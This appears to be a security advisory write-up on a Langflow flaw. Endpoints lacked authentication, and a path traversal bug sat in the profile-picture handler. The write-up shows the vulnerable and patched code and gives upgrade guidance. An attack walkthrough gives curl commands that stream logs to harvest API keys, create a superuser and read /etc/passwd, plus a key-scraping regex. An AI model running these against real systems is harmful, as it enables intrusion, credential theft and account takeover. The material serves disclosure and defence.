The Langflow dev team forgot to lock the front door. Critical API endpoints—including log streams and user creation—lacked authentication checks. Combined with a path traversal vulnerability in the profile picture handler, unauthenticated attackers could fully compromise the instance, steal OpenAI/Anthropic keys, and exfiltrate server files.
Langflow, a popular visual framework for building AI agents, shipped with critical endpoints completely exposed to unauthenticated users. This vulnerability allowed attackers to stream live application logs (leaking API keys), create administrative users, and read arbitrary files via directory traversal.
In the gold rush of GenAI, everyone is building a platform. Langflow is one of the shiny ones—a low-code UI to drag-and-drop your way to a sentient AI agent. It handles the messy stuff: chaining prompts, managing LLM API keys, and storing vector database credentials. Ideally, you want this kind of infrastructure to be tighter than a submarine hatch.
But here’s the thing about 'moving fast and breaking things': sometimes what you break is the concept of access control. CVE-2026-21445 isn't some complex heap overflow requiring precise memory grooming. It’s far more embarrassing. It is the architectural equivalent of installing a bank vault door but leaving the frame entirely empty.
We aren't talking about a bypass here. We are talking about missing functionality. The developers simply forgot to ask, "Who are you?" before handing over the keys to the kingdom. If you had a Langflow instance exposed to the internet (and Shodan says many of you did), you weren't running a private AI lab; you were running a public charity for hackers needing free GPT-4 credits.
The root cause here is a classic failure in FastAPI implementation. FastAPI is a fantastic framework, but it is explicitly 'opt-in' for security. If you define a route, it is public by default unless you attach a Dependency to verify the user's session or token.
In Langflow's case, the developers created a log_router and a users router but forgot to attach the authentication dependency to specific endpoints. The most egregious offender was /api/v1/logs-stream. This endpoint opens a WebSocket or streaming response that pipes real-time execution logs directly to the client. These logs are verbose. They contain input prompts, output tokens, and—crucially—debugging information that often leaks environment variables or connection strings.
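To get a sense of how trivially consumable such a stream is, here is a minimal sketch of parsing Server-Sent Events frames of the kind EventSourceResponse emits. The payloads below are invented sample log lines, not real Langflow output; the wire format ("data: <payload>" followed by a blank line) is the standard SSE framing.

```python
# Invented sample frames in standard SSE wire format -- not real Langflow logs.
raw_stream = (
    "data: INFO flow run started\n\n"
    "data: DEBUG Connecting to OpenAI with key sk-EXAMPLE\n\n"
)

# Pull the payload out of every "data:" frame.
events = [
    line[len("data: "):]
    for line in raw_stream.splitlines()
    if line.startswith("data: ")
]

for event in events:
    print(event)
```

No handshake, no token, no session: anything that can open an HTTP connection can read these frames.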
Simultaneously, they introduced a Path Traversal vulnerability (CWE-22) in the profile picture handler. The application accepted folder_name and file_name directly from the URL and concatenated them into a file path without sufficient sanitization. They assumed users would play nice. Narrator voice: Users did not play nice.
> [!NOTE]
> This represents a failure of Secure by Default design. The router itself should have enforced a blanket policy, requiring explicit exemptions for public routes, rather than requiring explicit locks for private ones.
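To make that note concrete, here is a framework-agnostic sketch of a deny-by-default route registry. All names here are hypothetical, not Langflow's code: every handler gets an auth guard automatically unless its path is explicitly declared public — the inverse of FastAPI's opt-in Depends() model.

```python
# Hypothetical deny-by-default router sketch -- not Langflow's actual code.
# Routes are guarded unless explicitly whitelisted in PUBLIC_ROUTES.
PUBLIC_ROUTES = {"/health"}
ROUTES = {}

class AuthRequired(Exception):
    pass

def route(path):
    def decorator(handler):
        def guarded(request):
            # Deny by default: anonymous requests only pass for public paths.
            if path not in PUBLIC_ROUTES and request.get("user") is None:
                raise AuthRequired(f"401: {path} requires authentication")
            return handler(request)
        ROUTES[path] = guarded
        return guarded
    return decorator

@route("/health")
def health(request):
    return "ok"

@route("/api/v1/logs-stream")
def stream_logs(request):
    return "streaming logs..."
```

With this inversion, a developer who forgets to think about auth ships a route that rejects anonymous traffic, rather than one that leaks.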
Let's look at the code that made this possible. This is the definition for the log streaming endpoint prior to the patch. Notice the complete lack of Depends(get_current_user).
```python
# VULNERABLE CODE
@log_router.get("/logs-stream")
async def stream_logs(request: Request):
    # No auth check. Just pure, unadulterated data leakage.
    return EventSourceResponse(log_stream_generator())
```

Any request to this URL, from anyone, starts the stream. Now, let's look at the file handling for profile pictures. It constructs a path using user-supplied strings:
```python
# VULNERABLE CODE
file_path = config_path / "profile_pictures" / folder_name / file_name
if not file_path.exists():
    raise HTTPException(status_code=404, detail="File not found")
return FileResponse(file_path)
```

If I send `folder_name=".."` and `file_name="etc/passwd"`, `pathlib` happily builds a path that climbs out of the intended directory; depending on where `config_path` sits, a few more `../` segments are all it takes to escape the jail entirely.
The Fix:
The patch (Commit 3fed9fe) introduces the missing dependencies and sanitizes the path input.
```python
# PATCHED CODE
@log_router.get("/logs-stream", dependencies=[Depends(get_current_active_user)])
async def stream_logs(request: Request):
    # Now we know who you are.
    ...
```
```python
# PATCHED FILE HANDLING
base_path = (config_path / "profile_pictures").resolve()
file_path = (base_path / folder_name / file_name).resolve()

# The Jail Check
if not str(file_path).startswith(str(base_path)):
    raise HTTPException(status_code=400, detail="Invalid file path")
```

By resolving the path first and then checking that it still starts with the trusted base directory, they eliminate the traversal capability.
Here is how a sophisticated attacker (or a script kiddie with curl) would chain these vulnerabilities for a full system compromise.
Step 1: The Eavesdrop

First, we connect to the log stream. We don't need credentials. We just listen.
```shell
curl -N http://target-langflow.com/api/v1/logs-stream
```

As the legitimate admin uses the tool, we see their interactions. "Connecting to OpenAI with key sk-...". Bingo. We scrape that key. Now we have free LLM usage. But we want the server.
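Automating the scrape is a one-liner. A hedged sketch follows: the log chunk and the key in it are fabricated, and real OpenAI key formats vary, so the pattern is only approximate.

```python
import re

# Fabricated sample log chunk -- not real Langflow output or a real key.
log_chunk = (
    "INFO  Connecting to OpenAI with key sk-abc123DEF456ghi789JKL0\n"
    "DEBUG prompt tokens=42 completion tokens=128\n"
)

# Approximate pattern for OpenAI-style secret keys.
KEY_RE = re.compile(r"sk-[A-Za-z0-9]{20,}")

keys = KEY_RE.findall(log_chunk)
print(keys)   # ['sk-abc123DEF456ghi789JKL0']
```

Point that at the live stream instead of a string literal and you have a passive credential harvester.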
Step 2: The Takeover
We noticed the /users/ endpoint is also unprotected. We don't want to just steal keys; we want to be the admin.
```shell
curl -X POST http://target-langflow.com/api/v1/users/ \
  -H "Content-Type: application/json" \
  -d '{"username": "ShadowCorp", "password": "pwned123", "is_superuser": true}'
```

Due to the missing auth check on user creation, we have now registered a valid superuser account.
Step 3: The Looting (Path Traversal)
Just for fun, let's see what's on the filesystem. Maybe there are .env files with database credentials that aren't in the logs.
```shell
curl "http://target-langflow.com/api/v1/files/profile_pictures/..%2f/..%2f/etc/passwd"
```

If the application is running as root (please don't run web apps as root, but we know you do), we might grab /etc/shadow. If it's in a container, we grab the environment variables. Game over.
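The `%2f` encoding matters: many routers split the URL on literal `/` before percent-decoding, so an encoded `..%2f` rides through routing as a single harmless-looking segment and only becomes `../` when the application decodes it. A quick stdlib illustration (the URL path is the one from the curl above, slightly simplified):

```python
from urllib.parse import unquote

segment = "..%2f"
print(unquote(segment))   # ../

# A naive router splitting on "/" sees one odd-but-single segment...
path = "/api/v1/files/profile_pictures/..%2f..%2fetc/passwd"
segments = path.split("/")
print("..%2f..%2fetc" in segments)   # True: the traversal hides in one segment

# ...but after decoding, the dot-dot-slashes reappear.
print(unquote(path))      # /api/v1/files/profile_pictures/../../etc/passwd
```

Decode-after-routing is exactly the ordering mismatch that lets encoded traversal slip past framework-level path matching.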
This isn't just about reading logs. Langflow is an orchestration layer. It has access to your Vector DB (Pinecone, Chroma), your LLM providers (OpenAI, Anthropic), and potentially your internal APIs if you've built custom tools.
1. Financial Impact: An attacker steals your OpenAI key. They resell it or use it to generate spam/malware campaigns. You wake up to a $10,000 bill.
2. Data Exfiltration: If you are using Langflow to process proprietary company data (RAG pipelines), an attacker can use the Admin access to query your own knowledge base. They can ask your AI, "What are the Q3 financial projections?" and the AI will happily answer.
3. Denial of Service: The cancel endpoints were also exposed. An attacker could write a script to continuously monitor for new jobs and kill them immediately, rendering the platform useless.
If you are running Langflow < 1.7.0.dev45, you are vulnerable. Stop reading and update.
```shell
pip install langflow --upgrade
```

If you cannot upgrade immediately (why?), you must isolate this service. Langflow should never be exposed to the naked internet without a reverse proxy (Nginx, Traefik) handling authentication before the request reaches the Python application.
Lessons Learned:

- Defense in depth: a reverse proxy or WAF in front of the application could have blocked `..%2f` patterns or enforced basic auth headers before a request ever reached Python.

CVSS Vector: `CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P`

| Product | Affected Versions | Fixed Version |
|---|---|---|
| Langflow (langflow-ai) | < 1.7.0.dev45 | 1.7.0.dev45 |

| Attribute | Detail |
|---|---|
| CWE ID | CWE-306 (Missing Authentication) |
| Secondary CWE | CWE-22 (Path Traversal) |
| CVSS v4.0 | 8.8 (High) |
| Attack Vector | Network |
| Privileges Required | None |
| Impact | Critical (Data Leakage, RCE potential) |
The software does not prove that a claim of identity is correct when that claim is used to execute a critical function.